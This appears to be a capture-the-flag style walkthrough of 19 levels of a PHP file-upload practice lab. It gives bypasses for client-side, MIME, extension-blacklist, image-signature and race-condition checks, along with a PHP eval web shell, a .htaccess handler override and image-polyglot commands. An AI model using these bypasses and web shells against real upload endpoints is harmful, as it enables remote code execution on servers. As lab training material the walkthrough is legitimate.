Pass-01
Upload a PHP file like test_info.php with content:
<?php echo phpinfo(); ?>
This fails due to client-side JavaScript validation. Three bypass methods:
- Disable JS: In Firefox, press F12 → Debugger → Settings → Disable JavaScript. Re-upload the file and access via copied image link.
- Modify HTML locally: Save page source as
custom_upload.html, remove JS validation blocks, add anactionattribute pointing to the original target directory, and open the local file to upload. - Burp Suite interception: Capture the upload request in Burp, change filename extension back to .php, then forward.
Pass-02
This uses server-side MIME type check (validating Content-Type). Capture a .php file upload request, modify Content-Type to image/jpeg, image/png, or image/gif.
Pass-03
Blacklist validation for specific PHP extensions. Use alternative PHP extensions parsed in some environments (e.g., .php5). Create test_03.php5, upload it, and modify Apache’s httpd.conf (if needed) to map .php5 to PHP interpreter:
AddType application/x-httpd-php .php .phtml .php5 .php3
Pass-04
Strict extension blacklist; use .htaccess override. Create a .htaccess file:
AddType application/x-httpd-php .bmp
Upload a PHP-embedded BMP file (shell.bmp) followed by this .htaccess. Accessing shell.bmp will execute PHP.
Pass-05
Blacklist validation without case conversion check. Upload test_05.Php directly.
Pass-06
Blacklist validation without trailing whitespace trimming. Capture a .php file upload request, append a space to the filename (e.g., test_06.php ).
Pass-07
Blacklist validation without trailing dot trimming. Capture a .php file upload request, append a dot to the filename (e.g., test_07.php.).
Pass-08
Blacklist validation without ::$DATA stream filter handling. Capture a .php file upload request, append ::$DATA to the filename (e.g., test_08.php::$DATA).
Pass-09
Validation chain runs only once. Capture a .php file upload request, rename to test_09.phP. ., which remains valid after single validation pass.
Pass-10
Single-pass extension blacklist that deletes forbidden strings. Rename the file to test_10.pphphp; the middle "php" is deleted, leaving .php.
Pass-11
White-list validation with %00 null byte truncation. Conditions:
- PHP < 5.3.4
magic_quotes_gpc = OFFCapture a valid .png upload, modifysave_pathto includetest_11.php%00.
Pass-12
White-list validation via POST with %00 URL-decoded truncation. Capture a valid .png upload, modify POSTed save_path to include URL-encoded %00 (i.e., %2500), then rename to test_12.php.
Pass-13
Image header check. Create a image-embedded PHP file:
- Open a valid JPG/PNG/GIF in Notepad, append
<?php eval($_POST['x']); ?> - Or use CMD
copy test_img.jpg /b + test_shell.php /a shell_13.jpgUpload via white-list and execute via file inclusion vulnerability (e.g.,?file=./upload/shell_13.jpg).
Pass-14
Uses getimagesize() image signature check. Modify a valid image’s first bytes to match a known header (e.g., prepend GIF89a to a PHP-embedded BMP).
Pass-15
Uses exif_imagetype() image signature check. Enable PHP’s exif extension, then create and upload an image with valid EXIF + PHP content.
Pass-16
Image re-rendering (destroys PHP code in standard image-embedded files). Use Beyond Compare to compare original and re-rendered images, iedntify unmodified regions, and inject PHP code there. Alternatively, use pre-made bypass images.
Pass-17
Race condition exploit: valid files are renamed, invalid are deleted. Capture a PHP file (test_17.php) upload request in Burp, send to Intruder, set to infinite payloadless requests, and continuously refresh the file’s URL (e.g., http://localhost/upload-labs/upload/test_17.php).
Pass-18
Race condition with image suffix requirement. Modify 18th pass’s myupload.php to fix upload path errors, create an image-embedded PHP file (shell_18.gif), and repeat Burp Intruder + infinite refresh exploit.
Pass-19
Filename validation ignores trailing /.. Capture an image upload (test_19.png), modify POSTed save_name to test_19.php/.. Alternatively, use %00 truncation if PHP < 5.3.